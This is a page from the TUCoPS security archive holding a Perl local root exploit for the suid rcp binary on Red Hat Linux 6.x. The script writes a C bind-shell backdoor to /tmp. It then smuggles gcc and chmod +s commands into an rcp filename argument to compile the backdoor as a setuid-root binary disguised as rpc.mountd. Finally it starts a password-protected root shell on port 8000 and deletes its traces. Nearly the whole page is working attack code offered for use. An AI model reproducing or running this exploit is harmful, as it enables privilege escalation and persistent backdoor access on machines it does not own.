TUCoPS :: Linux :: Red Hat/Fedora :: d86rcp.pl

Linux RedHat 6.* rcp local root exploit

#!/usr/bin/perl -w
####################
#RedHat6.* rcp local root xsploit.
#Opens password-protected rootshell on any port.
#Tested on RH6.1-2.
#
#Thnx to:
#Andrew Griffiths for this bug
#tlabs for rcpsploit.pl
#p0is0n.net for mutagen.c
#
#Config:
$passwd="dhgroup.org"; #rootshell password
$port=8000; #rootshell port
$RCPFILE="/usr/bin/rcp" ; #rcpfile.
#this can be found by doing: ls -alF `which rcp`


if( ! -u "$RCPFILE" )
{
	print "rcp is not suid, quiting\n";
	exit(0);
}

open(EVILCODE, ">> /tmp/mutagen.c") || die "Can't creat file: $!" ;
print EVILCODE <<"EOF";
#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in.h>
#include<arpa/inet.h>
#include<unistd.h>
#include<signal.h>
#include<stdio.h>
#include<stdlib.h>
#include<string.h>

void sigchild(int sig)
{
    wait(NULL);
}
int main(int argc, char **argv)
{
	setuid(0);
	setgid(0);
	struct sigaction siga;
	struct sockaddr_in sin;
	int sock, s, len;
	char passwd[32], ipasswd[32];
	char goaway[] = "go away!\\r\\n";

	if( argc != 3) {
		printf("Usage: %s <port> <passwd>\\n", argv[0]);
		return 0;
	}
	strncpy(passwd, argv[2], sizeof(passwd));
	sin.sin_family = AF_INET;
	sin.sin_addr.s_addr = INADDR_ANY;
	sin.sin_port = htons(atoi(argv[1]));
	sock = socket(PF_INET, SOCK_STREAM, 0);
	if(bind(sock, (struct sockaddr*)&sin, sizeof(sin)) == -1) {
	    perror("bind()");
	    return 0;
	}
	listen(sock, SOMAXCONN);
	bzero(argv[2], strlen(argv[2]));
	bzero(argv[1], strlen(argv[1]));
	bzero(&siga, sizeof(siga));
	siga.sa_handler = sigchild;
	siga.sa_flags = SA_NOCLDSTOP | SA_RESTART;
	sigaction(SIGCHLD, &siga, NULL);
	daemon(0, 0);
	while(1) {
	    len = sizeof(sin);
	    s = accept(sock, (struct sockaddr*)&sin, &len);
	    if(fork()) close(s); else
	    {
		    close(sock);
	            close(0);dup(s);
		    close(1);dup(s);
		    close(2);dup(s);
		    close(s);
		    bzero(ipasswd, sizeof(ipasswd));
		    read(0, ipasswd, sizeof(ipasswd));
		    if(ipasswd[strlen(ipasswd)-1] == '\\n')
					ipasswd[strlen(ipasswd)-1] = 0;
		    if(!strcmp(passwd, ipasswd))execl("/bin/sh", "-sh", NULL);
		    write(2, goaway, strlen(goaway));
		    _exit(0);
	    }
	}
}
EOF
close(EVILCODE);
open(TEMP, ">hey")|| die "Can't create file: $!";
print TEMP "10x 2 tlabs for their xsploit, to Andrew Griffiths for the bug report and to p0is0n for mutagen.c :)";
close(TEMP);
system "rcp 'hey fucker; gcc -o /tmp/rpc.mountd /tmp/mutagen.c;' localhost 2> /dev/null";
system "rcp 'hey fucker; chmod +s /tmp/rpc.mountd;' localhost 2> /dev/null";
unlink("/tmp/mutagen.c");
unlink("hey");
unlink("fucker");
system "/tmp/rpc.mountd $port $passwd";
printf "Now, rootshell on port '$port' with password '$passwd' must be opened.\n Have a nice day :)";

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH